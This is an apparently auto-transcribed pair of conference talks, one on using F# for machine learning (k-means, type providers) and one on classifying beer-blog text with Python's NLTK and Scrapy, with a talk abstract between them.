illustrate unsupervised learning and the my point here besides showing you a bit about unsupervised learning is I will argue that functional programming and machine learning are actually a really nice fit so so in the first case I quit in the first part what we did was a hey like we have a problem we use a library that's all nice and good it works and we're happy sometimes you will actually have to write your own so in general like when a software engineer tells you hey like there is a library but I'm actually going to write my own it's usually a red flag red flag red flag like it's not a very good idea but it actually happens quite a bit in machine learning or it could happen more often in machine learning and there are a few reasons one of them and that's kind of what makes the field interesting is like usually what people doing software is things which happened which are following like academic research or stuff which happened like 20 years ago or 30 years ago in machine learning is actually not uncommon to see people tell you hey I'm working on a algorithm which was on a research paper which is three month old that type of thing and so if it's three month old is like chances are nobody implemented it and if nobody implemented it if you want it is like hey you will have to do it and also the other one is like it's nice to use like stock models like the one I did with the with the support vector machine but at some point as you gain more knowledge of your domain you might hit the point where you actually need to start to tweak and customize your model and then the classic model out of the box won't work and so you will have to do it so it's not unusual to have to write your own and if you do that and I write your algorithm which I end up like doing fairly regularly it's you'll see that the most algorithms are actually have the same general structure with some variations maybe but like so typically one obviously you're going to read data because like if you don't have data you're not going to learn much two is like out of the data set what you're going to do is like this is the data this is how I want to shape it so you're going to try to shape it into what's called features you transform it into what you want three once you have the features you're going to pass it to something which is going to learn like what we had on the support vector machine and so that's going to be take the data and learn until until you're satisfied with the learning and finally once you're done is like evaluate how good your model is by probably looking at cross validation like at the other data set and so if I take these steps is like they actually translate pretty well into a functional programming style so read data is read data so as I can I'm actually going to show you that f-shop has something nice on the read data side which is not necessarily functional but the step two transforming two features that's exactly what the map is as I can going to take a list or set which is like my data set and apply a function and give me features that's a core concept of functional programming if I put a model and I try to learn from the data on the features typically what you're going to have is like learn until the model is good enough and that's a straight fit for recursion which is also like the bread and butter of functional programming and if you want to evaluate how good your model is what you're going to do is you're really going to do hey take your validation sets and a computer metric and like accumulate the results like for instance what we did with counts the ones and the zero and that's a fold and that's also like a straight up functional programming and so in the end like pretty much every implementation I have looks that way like you have a map in the beginning a recursion and then a fold and you're done and so that's nice because like like the problems you have of the translation like maps really nicely the other reason I think functional programming is nice is typically not what I'm going to do is you're always changing your model because like you have an idea it works and then you have a new idea so you start to change the features and all of this and so if you are in that mode where you're trying to iterate very rapidly you can't really afford to change your domain model all the time like the last thing you want is like to have classes and all of that like start to tinker with this that's just not right and so an old style is in my opinion or in my experience not working really well and instead of forcing the domain model like into the into your algorithm what works much better is like take the objects take the data the way they are and just apply functions to it and that's much easier you can manipulate the functions you don't touch your domain model and it works just very nicely so I said that I was going to talk about unsupervised learning so supervised was hey I have a question here is the data like do the best you can to give you the answer to the question I know unsupervised learning is the opposite is like hey I still have lots of data but like I don't know what I want to know about that data so it's unsupervised because like what you're trying to do is like to give to the computer data and and you hope that it's going to come up with something which is interesting so one of the examples classical algorithms is a clustering so clustering would be I have maybe a data set about my clients I have maybe history of my products and all of this and what I'm trying to do is I'm trying to find patterns like maybe something like similar products or similar clients like maybe maybe ladies have different habits than guys maybe all the customers have different habits from younger customers so you're trying to see if you find patterns or clusters of clusters of items in your data set so one of the ways to do that is the K-means algorithm like and so imagine that this is your data set so this is clearly like a tiny data set just for illustration purposes but like if I look at this I see like two clusters there's like a bucket of people on the left and a bucket of people on the right what I could do is I could say hey let's try to see if I can recognize two clusters in here and so I'm going to create what's called a centroid that's like the big I think they're orange I'm kind of blind so I never know what color is what but like the big thing in the middle like that's a centroid and I'm saying suppose I have two clusters now what you try to do this take every take every element in my data set and assign it to the closest centroid so that's a map is like take element one map it to a centroid so on and so forth so what I would do so in that case is like what I did is like all the guys on the left became I believe red and all the guys on the right became blue like I assigned them to the two different clusters centrites now the next step would be take the centroids and move them updates so that you get better so what I'm going to do is like now that I know that all the guys on the left were belonging to centroid one take centroid one and move it to the middle or to the average of that cluster so move it a bit and do the same to the other one so that's what I'm doing here and finally like look at try and look at whether the result changed if like the cluster didn't change there is no reason to keep going because you're you're it's so it's going to keep staying the same if it changes keep going until nothing stops so that's a recursive function like do it do it do it until it doesn't change so that's kind of how the algorithm or the clustering the key means algorithm works at a high level so what I'm going to do here is I'm going to jump back to code and actually that's not the one I want so I'm going to show you also something I started doing with the friend so this is let's say so the project is called Vega hub and the the intent was to be able to rapidly visualize charts so try at your own risk I would say like it would be charitable to describe it as a alpha quality and so there is a possible chance that everything explodes during the demo so let's spice it up a bit but I like to live on the edge so we're going to take a classic data set like what it is is not usually important but like it's like a set of flowers I have like three types of flowers here like Aris Setosa versicolor and virginica like this is a classic of machine learning and you have like information about the flower like sepal length sepal width whatever that means like I'm not a botanist so and so what I want to do is I want to see if I can find clusters in that data set so the first thing I would actually like to do is to resize visual studio so that's what I'm going to do here I'm going to read these guys I'm going to read my data set into a type I just created here and this is not usually important and I'm so I'm going to fire up Vega hub so now what this is going to do is like it should fire up the browser victory so that's already didn't bomb I'm very happy and here what I can do now is live this is using essentially a d3 Vega and a signal r and so now the browser is here and I can start sending things to the browser as I want so for instance I can do something like hey give me a scatter plot and you're going to take the data and I want x to be a pedal width y to be pedal length and use the class to color and use the other one for size and that's the type of thing I get and I'm kind of I think this kind of cool because now what I can say okay how about the other variable this is also nice because I have types so I can I can actually see what I have available here so I can say okay sure let's show this guy and let's see how it looks and you hope hopefully so I'm still colorblind but hopefully you can see there should be three different colors and three different clusters on the screen I should probably yeah so that's that's hopefully this shows like I have three clusters so what I would want is like to apply my clustering algorithm and see actually a three three clusters so I'm going to to speed up a bit on this for the sake of time but like I'm essentially the point I would like if I had more time and if you look at the code which is actually online you would see that this maps pretty much directly what I described before which is like I'm going to have a clustering I'm going to have two steps like assign centreds to the point update the centreds to the point and recursively repeat until this is done so that's really my clustering algorithm and the the higher point is like this is not a completely trivial algorithm it's like 30 lines of code it's done not even that like 25 and now I can just apply it to my data set here and I'm going to see if it works actually I like let's do that so now is the moment where I'm hoping like things are going to ah did you see that like so I'm going to do it again because I like like moving things so like first is like you should still have three colors or three clusters and you have like big blobs here and these are my clusters and what I'm going to show is like what you should see is like the the the the centreds are moving as you go so you see like the algorithm updating and they are they are like actually moving to the right places so you see like a kind of how the the algorithm is uh is progressing and so I think that's uh that's kind of what I have on the the clustering part so let me close that guy I'm actually very happy didn't explode and I can't was the bit and so the the part of it is like I want to have enough time for the type of writers because I think that's a big deal I want to have enough time on that section so so type of writers the if you recall like the step of the algorithm it was like step two three we're doing things with data the problem is like you have a step one and the step one is like get data and if you listen to people talking about machine learning and you go to meetups and all of this like people like go talking about uh parallel algorithms and GPU and like the latest craze they do and it's like the thing nobody tells you which is the sad truth and maybe I shouldn't tell you the dirty secret is like you're not going to spend much time creating fancy algorithms you'll if you do machine learning you're going to spend most of your time cleaning up data and getting them uh getting data which you can work with and that's kind of like the unsexy part of machine learning and it's like a kind of a janitorial work and it's uh it's really time consuming and it's really important because really if you have no data you have no learning so now that's a bit of problematic because so part of the at that point you have a bit of a trade-off is like it's nice because you write code maybe in whatever language of your choice and like at the moment you're working in your language you're happy you have your compiler and all of this everything is the types you expect but the problem here is like you're trying to get data from the rest of the world maybe a CSV file maybe sequel maybe jason whatever and that's not in your type system and so now like it's uh it doesn't know anything about your class doesn't know like it's a jason thing like it's a piece of text and so now you have a choice between two things and neither of them is really fun the first one is like you can say that's fine i'm going to kind of ignore the types and i'm going to use a dynamic language and i think that's why people like python there is an upside to it is like hey you don't have really much types so it's like you can hack at whatever you want and be optimistic and if it works it works the downside is like the really the compiler is not doing much for you because the only way you will know if it works actually the only way you know it didn't fail is if you run it and it doesn't explode that's the best you can get right because you don't really have types on top of that is like well so that's that's not great uh it's easy to get stuff but you have no idea if it works the other side is like you can take a language maybe like c-sharp where you have static types and the the benefit is like the opposite is like uh yeah it's safe the compiler is going to help you it's good to tell you hey you told me it should be an end it's actually a string something is not right the problem here is like to do that you're going to have to use uh typically something like an ORM or like uh like i'm sure you guys are all fan of entity framework like all these uh big things which are just like you have to use tons of scaffolding to get there so that's not cool and it's not fun because i have one solution i have two bad solutions to choose from and so this is where type providers are absolutely awesome uh type providers can have resolved this magically and you're going to get the easy hacking you would get from python with the with the performance and all of this coming from uh from uh static types so i'm going rather than talk more about it i'm going to demo a bit of type providers and show you uh go from the obvious ones to the uh crazier ones so the obvious one uh so that the prototypical usage for type provider is like you have data the data has some form of a schema so it's a mechanism which is uh uh of course that would happen uh i should still be fine so uh while uh visual studio is resulting uh uh so uh where the type provider does it's a mechanism like you can a bunch of them ship out of the box there is a big library of type providers uh open source ones like uh but the thing which is nice is that you can write your own if you have a schema you want to type provider you can write it like it's an open extensible mechanism uh the and the way it's going to work is like uh so let's see the way it's going to work is uh the type provider is essentially going to look at a schema uh look at that and in fair like uh given what you give me i think the types you mean are this and it's going to create everything for you and give you types so i'm going to demo this on uh yes let's see like it's it exploded but not so we're expected it was a surprise so good so uh we are back here so uh i'm going to open fsharp data which is the biggest open source collection of type providers i'm going to start with the most obvious example so like in any uh in any project like at some point you know that you're going to hit a csv file it's kind of the uh the grand daddy of all no sequel storage technologies and at some point you know the accounting department is splitting out a csv file or something like that and i'm sure that all of you guys have written at some point a csv parser i'm sure you can do it it's not very difficult at the same time it's a bit of a waste of time so uh this is where like a type provider is nice because uh what i'm going to use the csv type provider to look at that file which is the passenger list from the titanic and uh it's not that i'm particularly morbid but uh i do like this data set and so that guy has like uh pretty typical has headers like a passenger id did that guy survive uh was it the first class the second class or third class age and so here you i can see that survives a zero or one it's probably actually a boolean and coded as a zero one here i see that i have uh i have probably doubles i have strings i have missing data so you know like your your bread and butter like poorly uh like painful uh file to uh to deal with so you could go ahead and write your own parser or you could do something like that you could say hey i'm going to use a csv provider and it's going to provide me types and i'm just going to like you look at that file technique that csv and uh that's going to create a type titanic great done and then i can do now i can simply say use this get the data grab the first one and so at that point is like i created my the parsing is done the types i don't know i can do something is first dot dot come on uh-huh uh-huh the magic is not happening this is uh ah here we go again well that's proving the point that it's uh doing it uh lazily i guess so what uh what we'll see in a second normally either that or like a visual studio is going to explode on me again which would be highly unpleasant uh okay so i will stop on this guy so under normal circumstances i let's say like you saw it happen and what you should see happening what you should see happening here is uh you should see that it created actually a full class i'm going to try it again because this is really upsetting okay yeah you'll have to trust me for this like i'm actually not sure what happened but it's going to create properties and the properties will have all the right types like the survived should be a boolean uh the doubles are doubles and all of this so your parsing is done so let's say that it's a successful let's ignore a bit the fact and move on to the fact that this was a completely successful demo and uh so that's uh you have that type of type provider for json for xml for cql like all your classic things where you have a schema which describes the data that's standard one you have some which are a bit more crazy like the world bank type of other is for instance pretty interesting so the world bank is this institution which publish which does lots of bank things like whatever banks do but or whatever the world bank does but like it's also known for collecting tons of statistical information are all my type providers dead no it looks like okay you know what i'm going to do is i'm going to just restart a visual studio here so what uh what the type provider so what the world bank does it also publishes lots of information about countries uh everywhere uh in the world like with the economic data and all of this and what the type provider is going to give you it's going to give you i hope i will not have to ask you to imagine this again like it would be nicer if it worked but uh in the normal circumstances it's just going to give you all that information at your fingertips okay so let's see ah here we go ah i'm so happy so uh so what i can do here for instance here in one line i created a data context and the data context is connecting live over the wire to the world bank like there is no magic no nothing and if i do world bank dot now what's if i put world bank dot in the right place uh this would uh this will show me things like this hey like the world bank can you give you countries regions of topics i'm going to take countries and uh and now is like i could say like countries dot and it's going to help me discover what data i have available so if i did countries i could say afghanistan blah blah blah let's say i'm in norway i'm uh i don't really know much about norway so i'm going to say norway north africa norway nor norway here we go and so what do i want to know about norway i want to know other stuff things but maybe i could start with the capital city and so here i'm going to do that i'm actually going to load all the stuff i should have loaded before and so what you will see here is like what this did is like it hits over the wire the world bank uh got me like hey here's the list of countries you have uh here is norway and it got me like the capital city which i believe is correctly uh returned correctly as oslo so so that's so that's neat like it's pretty awesome i could ask questions which are more interesting and so this is uh like the capital city is not man blowing but like the thing which is kind of cool is like this one i could say countries that norway not namibia actually i could do namibia too but uh and here i could say what about the indicators so i could start looking at things like uh what do what could i want to know about norway i could want to know about the benefits for the first 20 percent of the population i could type a d maybe an und i could want to know about the deck alternative conversion factor whatever that hell this is i could uh i could go to z and i could get the bank z score like i mean this is unbelievable like this what i have here is i have i think 2000 series and uh if i if i did something that population for instance point of sale terminals see that's uh no i'm going to do that one okay i'm going to do population so i could i could ask for instance for the population in 2000 let's say 2005 and like this is again going to go over the wire go to the world bank and tell me the population of norway in 2005 was like four million people so i don't know if it's true but like that that sounds like that's right just in case there is a half person like so that's starting to be a bit more cool so now you can you can start to go a bit crazier so i mean the thing which is impressive about this one if you think about it like it's going over the wire and on the fly it's going to create classes and all that stuff for you with nothing no orm like no and no stuff this is like uh when you start thinking about this this is mind blowing like my head melts every time i think about what's happening here so now you can push the idea a bit further and you can say hey that's great like data has a schema i can get types like i could really uh how about other languages like a language is also something which has a schema and i could also start to do things with it and so like one guy at blue mountain decided that maybe you could do type provider to r so r is like this statistical package uh it's like a language created by statisticians for statisticians so as a language is like pretty awful but uh but it does awesome some stuff for statisticians like and it i can now here use r from within f-shop so it's going to give me things like hey you can uh you can see what packages you have i see i have matrix i have a uh uh boot i have like a graphic so uh now is like r is uh included like came magically inside f-shop and i can start using it with on top of that the benefit of types so that's pretty cool so i can start merging it with uh maybe some f-shop code so here what i'm going to do is i'm going to for instance create uh a list of random numbers and i'm going to say hey take that and that's a f-shop type and send it to r so let's do it and now what i will see in a second is like i see a little window here and boom like this just uh now i'm talking to r live and like seamlessly from f-shop this is pretty neat and the place which is really really neat is that uh you could say that's great but uh really i could also use r instead of using f-shop it's like why would i use r from f-shop the thing which is nice is like uh what i can't do from r is use the other type of letters so for instance what i could do is i could say hey i'm going to take every single country from the world bank pull these guys and retrieve the population in 2000 done so that's happening over the wire nothing to do and then i'm going to put it in the data frame and i'm going to send it to r and uh and so now i get the best of both worlds as i can use like uh data from jason data from here data from there and here i see a little blink which tells me like uh that r did his job and i'm going to get things like that like and so if you think about the amount of work you would have to do otherwise to do this like this is awesome because i like the map in r i like the data from the world bank i can just take it left and right and it's all working and the beauty is like i could probably do that in python as well but like i would make typos all the way probably because i type poly and uh here i get also compiler help i get intelligence all of this so this is really this is really brilliant like i really like type providers so let me wrap this up and go back to my slides to conclude so what i hope i showed was like yeah you know it's like uh you get all the benefits of dynamic and all the benefits of static so my conclusion is like one f-shop is a really nice fit for machine learning on dot net functional style is great for machine learning the rappel is uh is making a the difference is a crucial in your experience it integrates with everything you're having dot net it's a language also which is great because uh with the rappel you can uh you you can do flexible exploration but it's also dot net code so it's like i can also promote my script put it into a library and i can now run it in production so that's nice because it's flexible but it will perform like a champ if you put it in a real system which is not always the case with other languages and type providers are just like a story no other language has except maybe idris i hear they do something like that so you get like static types without any of the problems so this is uh this is awesome my recommendation to you guys is uh as a software engineer do you do yourself a service and take a look at machine learning and data science maybe you won't like it but you should probably look at it because it's a very fun area lots of things are happening there and these guys also need software engineers so like uh it's a fun place to be and it's actually less difficult than what you might think and if you do it like uh i would recommend you do it with a functional language and if you're on dot net in particular like i would argue that you should really be doing it with f-shop and otherwise you should probably and uh beyond that is like uh if you uh i showed you like one take on f-shop and why it's awesome but like today this room is going to be packed with good stuff like there's going to be zamarin with f-shop with rachel reese quake with f-shop with wil smith and there will be something awesome and airline with an italia ticina later so this is a if uh if you if you enjoyed what you saw like stay and there will be more in different directions and get involved the committee is awesome go to f-shop.org and friday some twitter and uh if you loved it or if you hated it you can rate me using the right card and it's a test yeah it's like uh so i'll give you a hint on what's the right solution is and uh and that's uh that's what i had for you so if you want to contact me this is me on twitter this is my email and uh come talk to me and uh and uh thank you guys for coming also early today like i'm super excited thank you
|
While Machine Learning practitioners routinely use a wide range of tools and languages, C# is conspicuously absent from that arsenal. Is .NET inadequate for Machine Learning? In this talk, I'll argue that it can be a great fit, as long as you use the right language for the job, namely F#. F# is a functional-first language, with a concise and expressive syntax that will feel familiar to data scientists used to Python or Matlab. It combines the performance and maintainability benefits of statically typed languages, with the flexibility of Type Providers, a unique mechanism that enables seamless consumption of virtually any data source. And as a first-class .NET citizen, it interops smoothly with C#. So if you are interested in a language that can handle both flexible data exploration and the pressure of a real production system, come check out what F# has to offer.
|
10.5446/50783 (DOI)
|
Hi, welcome everyone. This is really time of the day when you guys are probably quite tired from going to talks all the time. And here I am, the only thing that stands between you guys and the party that is going to be going on downstairs. So I tried to do something about that. I think this is a talk about B, but it's also a talk about making sense of unstructured data. So we're going to keep a theme. My name is Anders Noras. Nice to see you guys coming up here. I work for a company area now called Etara. If you want to know more about us, you can visit our booth down in the expo area. So yeah, as I said, this is a talk making sense of unstructured data. It's using lots of those things that some of you might have studied in uni, which is natural language processing and computational linguistics. I don't know, has anyone studied that? Yeah, there's at least one guy in the room. I figured I'd switch that around because those talks, I've been to a few, they are very academic and they give you sort of insights into the maths and stats behind things. And where do they sell them? Do they show how to actually use these things for proper applications? So since I'm not all that good at maths, I figured I'd do the latter and actually show some real scenarios for this. So we're going to be using some familiar tools. I wrote a tweet the other day that I was in the process of rewriting all my examples to Swift since I had been planning to use Python and when Apple came up with the Swift language, they claimed that it was so much faster than Python, so naturally I would use that. That was all just a joke though, I'm going to use Python for this. And there is a reason for using Python. Python has sort of a history to it within the field of scientific computing and language processing. And I've been asked a few times why that is. And I think it's probably got a lot to do with Google hiring lots of Python developers back in the early noughties to work on their data processing. So they were really pushing forward data processing on Python. And at the same time you had libraries such as NumPy and Psypy which brought lots of the scientific community over to Python. Because they were used in things like MathLab and making the jump to Python was much easier than going to anything else. Now there is probably a very good reason that you're not using a static language like C sharp or Java for this because some of the computations that are going on behind this are really hard to implement in that sort of language compared to the dynamic languages. But it might as well have been Ruby. And the reason why Ruby didn't end up there, you do have some libraries for this, but Python is where you have the best ones. And just to speculate, I guess that is because Ruby was a web framework or a web language for developing Rails apps. But that's changing as well. So you get much easier to do this there as well. But we're doing Python today. It doesn't really matter if you know Python or not because the examples we're going to look at are pretty straightforward. But we're going to look at some concepts. So for the one guy who had studied this before, it's probably going to be a rather familiar. And hopefully for you as well, we're going to see some interesting examples. So this is really the thing that is big data all the way. And this is actually a beer that's available in San Francisco. It's a big data API. It's an imperial paylale. It's not really this. It's someone who photoshopped this, but it's still kind of funny. So we're touching on that big data thing. We're not going to process vast amounts of data today, but we're going to do something. So I want to introduce you guys to a framework called NLTK, the natural language toolkit. Has anyone used this before? You have? Good. So this is probably the industry standard for doing these things. It's very commonly used. It's very mature. And it's used very much in research work, but also in other applications. So I was going to show you some code just to introduce it to what this actually is. So the first thing we need to do is actually import this thing. And then let's create a sentence, which could be something like I drink. I've never had a craft beer that hadn't been brewed yet. So now we have that. One of the simple things you can do is that you can tokenize this sentence, which is to split it into the words. There, which is the NLTK word tokenize. And this is the basic functionality for this. You have other more advanced features for doing this as well, but we're going to easily root now. And we can also tag them on a part of speech tagging, which if that's totally unfamiliar concept to you, in the second one this and we'll just feed those tokens into the post tag function. Thanks. I can better. Yep. So nice if you tell me those things because I'm seeing you all guys pretty perfectly, but might not be that easy. My stuff just as well. So sorry. No, I can't, but I'll make things full screen a bit later. This is in the middle of my slide deck. So I'll just print the tag words. So here is actually that sentence we have divided into its different words. So you have one word. One thing you could notice is that the NT ending, it's tokenized that as a separate word. It's sort of, it's not. So the first thing we have is a personal pronoun, I, which is similar to he, she, it, and so forth. So the second thing, which could be both a noun or a verb, but in this case, it's a verb and it's determined that out from the sentence structure. And it's also a word in the present tense, but not in the third person. So what is a singular noun, beers is a plural noun, what is something called a VH determiner, which is sort of we could substitute this for which. And the sentence would still sort of make sense and have yet another verb. This is an adverb, not, and we have a verb in the past participle, brood, ditto, and an adverb to finish. So we sort of get the sentence structure out of this. We can do lots of things with that, but today we're actually going to do some simpler things. So we're not going to work on the actual sentence structure, but we're going to do something related to this, just to start with. Does anyone recognize what this is? Yes, I need someone to help me with this. So does anyone want a beer? There's one in the back there. There's an opener there as well. Anyone else? There's a guy over there. Could you throw that ball opener over to him afterwards? So yeah, it's the Bayes theorem. For those who aren't familiar with this, this is probably something like the Pythagoras theorem of this area. It's the one thing that you were talking about at the very beginning, and it's very widely used. The common example is things like spam filters and stuff like that uses this. And the concepts of Bayes are very central to what we are going to be doing later on today. So you guys kept the bear caps? Yep, good. So we have to play a game of pretend there, because they don't look exactly like the ones I have up on the screen, but they're similar, aren't they? Yeah, good. So we have two bear caps, right? One of them has logo on both sides, and one of them is blank on the other side. So you're on the left-hand side or right for you guys on that side. You have this one, not that one, but this one with logo on both sides. You have this one. So let's do a little experiment, which is what you use this thing for. So we have two possible coins, one two-sided and one single-sided. So this has some possible outcomes. So if you have the two-sided bubble cap, you have the single-sided. No, you're going to pretend that it's two-sided. Can you manage that? I always have to give your bear to someone else. Does anyone else want to bear? Yeah, there's one there. Okay, you were really fast. The girl in the back wants one. She's taking precedence. You have to give her the bubble opener. But I was lost when I had. There was a booth down who had really good bear. So, yeah, so when you flip yours, you can either have logo or logo. While it's where you flip yours, go ahead and flip it. There was no logo. You have to flip it first, though. You're going to just hold it in your hand. That's too lacy. Yeah. So just flip it and call out what you got. You dropped it. You got a blank one. No logo. Blank one. Exactly. So you either get a blank one or a logo. So we can feed this stuff into bias theorem and say that yours is a fair one, since you have two different options, while yours is sort of biased. So for a fair flip, we had a logo which gives this one to three chance. That is going to be a fair flip if we choose one of those at random. So we can go ahead and repeat this experiment. You're all pretty clever. So you know that you're kind of screwed. You get the same thing all the time. Whereas you can get a blank one. You got a blank one again. Very good. So the odds of that is really one to five if we have two instances that we have observed this. And it goes on like this. So reverend bias walks into a bar because he was actually a reverend. And he, as I've heard, that he came up with this theorem to prove the existence of God, which he didn't manage. But we can use this for some more interesting stuff. So let's head on over here. Is it readable for you guys, or should I crank up the font a little? Bit bigger. Okay. I'll just have to head into the preferences here and the font. So like 200 points is probably, are we doing it? 20. So let's go grab NLTK again. And we're going to have some bear reviews. And we need to have some positive ones. I type pretty fast, don't I? And we need to have some negative ones. So negative reviews. Like that. And let's just create a collection of all those reviews. And we're going to do that by creating tuples of words and sentiments for those words. And we're going to take all the positive reviews and all the negative reviews and just iterate through those. And filter them. So we're going to come into lower case just to have some sort of uniformity to them. And then we're going to do word in words. And we're going to split those on spaces. And we'll just keep the words that have some length to them. So let's say, I have an extra parent, sorry. But that, which are three letters are longer. So, and we'll, we can print the print those. Sorry, need to print. Let's just print the reviews just so you can follow along and see what we have. So I'm going to run this now. And I have a typo. Words not defined. Yeah, thanks. No, not word lower. But we are, we need to append something to the reviews as well, don't we? So we're going to append our filtered words and our sentiment and we're going to make that a tuple. So let's just add a set of parents around it. Here we go. So we just get an array of words that are in each review and they're tied with either positive or negative. Rather simple for now. So let's get a function that we can use to just grab all the words from the reviews. So say that we pass this reviews array we got up there into this and fish out all the words. So let's do for words and sentiments in reviews, which is what we expect to have in there. Let's just put that into the all words by extending that array with the words only. And finally just return all words. And just to see what we have, let's probably have a plural name on this. Get words and reviews and pass it to reviews. Run this again. Did we get anything? Yeah, we have a line. So this is interesting, but what we are curious about are really the features that are available in these reviews. So let's define a function as well for extracting the features of the different sentences. So let's create a function that takes a word list and changes that into a frequency distribution using an LTK for that word list. And then get the features by grabbing the word list, not the filtered. All the keys from that. And then return the word list. So I do. And then let's just assign that to a variable. So let's get the word features from get words and reviews, reviews and finally print that. And this is going to be a data structure. So let's use print to print. In line 19 words list. Thanks. Like so. And just import print to print. And with an indentation of three. So these are our different word features of the entire corpus of reviews we now have. So we need to have sort of a concept of a document, which is a single review. And from that we're going to extract features using a extract features method. So the document words are what we are interested in is just a set containing the document. And the features will be a hash. And all we need to do then is for each word in the words. The word features array, sorry, will just create a key in the hash that says contains and the string and interpolates the word in there. Word in document words. And finally return the features. Well, misspelled this. Let's just keep it as a feature not to. Finally, we have to do something that is the boring part of this. That is to create a training set. This is what you usually spend the most time on and we'll see examples of that in just a second. So you can apply features function with extract features. And the reviews. And again, pretty print. The training sets to see what's in it. So we get this set that if it contains beer, absolutely true, blah, blah, blah, so on and so on and so on. We have all the different combinations of features that these sentences can have. Classification and the way we're going to do that is that we're going to create a classifier. It's just means that it's there or not. So we haven't come to whether it's positive or not yet. So a classifier and that is going to be a naive bias classifier and always do that. And we're going to train this on the training set that we just created. And just to see how that looks after you have a trained classifier, we're going to print the most informative features. Let's just take the 20 topmost. So now we have this table where whether it contains these different words and you have the weights for whether it's a positive review or whether it's a negative review. And once we have that, we can actually start using this for classification. So let's just print classifier and call the classifier method and hand off to the extract feature and say something like, I'm this one. It's a very good bear. So I'll say super excite. I shouldn't choose so difficult word should I excited about this bear, which I suppose is a positive statement and disagrees. Let's do a couple more. This bear tastes yuck. And do not want this bear. You get picture will stick with those two. And it's positive. It shouldn't be tastes bad. Let's change it. It's positive again. You know what? It's probably a type of earlier up. I have this little neat trick I can do. I just rewrote this really quickly and change the training set back to something proper. So the only thing that's changed is this thing up here. So I probably mixed up the positive and negative reviews in the first iteration. But it's trained on the same similar data. It's done the same way and it's able to determine different properties. So that's basically a one on one example of by years. But another interesting thing is that we need to have some data to work on. So I figured since this is all about beers, a good source for really unstructured data is blogs. There are quite a few like balding, reclining hairline men that are writing about beer out there. But the thing is that these blogs, they have all things going on in them at the same time. So it's highly unstructured information. And this is what I find interesting is to see can we take something like this and get something from that. The first thing we need to do then is that we actually need to go out and gather some data. And for that I'm going to be using a framework called Scrapey. Is anyone familiar with Scrapey? Yeah. It's probably one of my favorite web crawling frameworks out there. And it's basically built to scrape information off websites. So it's intended to be used in a very structured way. Where you have a structured page that I can go to this element and get that information or go there and get this thing. And what you do is that you build up a collection of different items. Now, for something like these blogs, they are very, very unstructured. So you can get some things like a title. And you can grab all the links and things like that. But the actual content, the information is hidden within there. And you can't just go off with a CSS selector and go grab the essential content from there. So we have here a small little spider that runs off to a set of predefined domains where it starts. And sticks to those. So it has a list, maintains a list of allow domains to visit. And then just doesn't work on the query strings, but the important part of this down here were parse item. Where it actually goes and grabs the document and uses a library called readability to try to filter out the main part of the web page, which is the actual content. So that's a way with the header and footer and things like that and stores those files. So go here, run the spider and take sort of a half an hour's break to just like this filter or crawl the entire internet on the conference Wi-Fi. Luckily I've done this before, so we don't need to keep this thing running. It's going to keep on for a while. There's quite a lot of information out there. What we have after running this is that we have a huge set of web pages. And we do have some of them in here in the data folder. So just go ahead and open one of these in the browser. Just go to the full browser. So it looks like this. So you have someone writing about their favorite peers. Well, nice. So it's basically the same thing as you have here. And we have thousands upon thousands of these. So what I find interesting is how do we extract information from that? And when you get to like real world information like this, I find that the naive bias approach seldom is the best one. So we're going to go back to MLTK and I'm going to just take a little pause and talk about this little beer label that we got here. This is an actual beer. You probably are familiar with this looking at fonts because this little sentence has all the letters in the alphabet in it. But it's also something different. It's one of the most famous trigrams that are out there. And trigrams are combinations of three. And in this sense, it's the different combinations of three words that are in present in the sentence, the quick brown fox jumps over the lazy dog. And those are probably supposed to be the quick red fox, isn't it? So they left that out of design reasons for under label. It's still a cute beer label, though. So you would have something like the quick red one trigram, quick red fox, another one, red fox jumps, and so forth. And these things are really useful for getting features out of the text. And we're going to work a bit with trigrams now to see how we can classify different sentences in these reviews. So we're going to head back into our Python code. And we have this thing here. And this is also good reason for using Python for this because you can write, like, straightforward code. So what we do is that we open a file that contains all a list of all the web pages that we have crawled. So to go through each review page that we have, and we open the HTML file, just print the title, get the HTML content, grab a bunch of sentences from that by just getting the text from the HTML document, tokenizing those using a sentence tokenize function in MLTK, which will be similar to what we saw with word tokenize earlier. But what MLTK will do is that it will retain sentences and no sentence structures. So it's going to be quite clean. And then just go through each of those sentences and extract the features. And the extract feature function that we have up here is really something that uses a different kind of word tokenizer that has more knowledge of the language than the one we used earlier. And it's going to go out, tokenize, sentence into different words. Then we're going to go and part of speech tag this, as we did in the earlier example. And then we're going to get information on what word classes the different words are, if they're announced, if they are verbs and so forth. And then just tag, simplify the tags just to make it easier to keep them with the diagrams. And then just go through this and create the different combinations and have the word classes in there as well. So as it does this, it's going to ask us what the different features are. So if I bring this thing up here, we get a blog post called by the Gloss show, Hollywood Organic Brewing Company. And we get the different sentences. And I'm going to know that this is something generic babble, which is there is lots of in these. So we talk a lot. I'm going to say that this is other. And he talks a lot. He's very talkative, this guy. And suddenly we get down to a description of the beer he's drinking. And this is, so let's just tag that by saying, D, this is a description. Everyone loved it. That's kind of a review, isn't it? This is an opinion. So let's say that that is a review. And so forth. Let's go on like this. This is really the hard, long and boring part of working with this. It's training classifiers and it's a difficult job. Luckily for you, I've done this before. Based on this, we're going to have, and let's just bring up this, we're going to have lots of data. So sublime, I'm just going to bring up an editor. So classification training. It doesn't really matter. I'm just going to open a file. It's called classification training JSON. There's a video later if you don't believe me. So we're going to increase the font size here and I'm just going to format this. Like so. So this is a huge set of data that has been tagged and classified into different sentence styles. So here we can see the diagrams that appeared in the sentence. The true thing is just here to create a hash. So what we have here is sort of a large set of different observations. And when we saw this, we found this to be some generic information that's not really of interest to us. We are after the descriptions of the beers and the reviews which are in there. So we want to pull out that information from the web pages to use that in a structured way and try to use that as data for our application. So this is basically what is happening behind the scenes here. Now, so this fall we only have diagrams of the words which are very similar to the features we had for our Bayer's thing. So this time around, I told you we were not going to be using Bayer's. We're going to use something called maximum entropy or max and which is often preferable over Bayer's when you have data that is not very similar. And with text, you have all sorts of different variations. So this is probably going to perform better in those scenarios. But it's a much more heavy algorithm than Bayer's thing. So this is going to take quite a lot of computational power and we'll see that just in a second as I show you how you can use NLTK to actually create a... or classifiers for this. And this is really easy. Since we already have a structured file with data, this is the JSON file we just saw with all the diagrams in them and classifications, we can just go ahead and open that file and just create a maximum entropy classifier and train that on that dataset. The exact same address we did with Bayer's data earlier. And this is going to take some time and I'm going to show you that by running this. So it's going to ask us if we want to create this. Oops. So it starts off and it's going to work its way through 100 iterations here, which as you can see is going to take some time. So these things take time to build. So a trick that is very nice to know is that you can use the pickle serialization library in Python to really when you have that class already trained, you can just dump it and you can reload it later. And lucky for you have done this before as well. So let's head on over to the not the 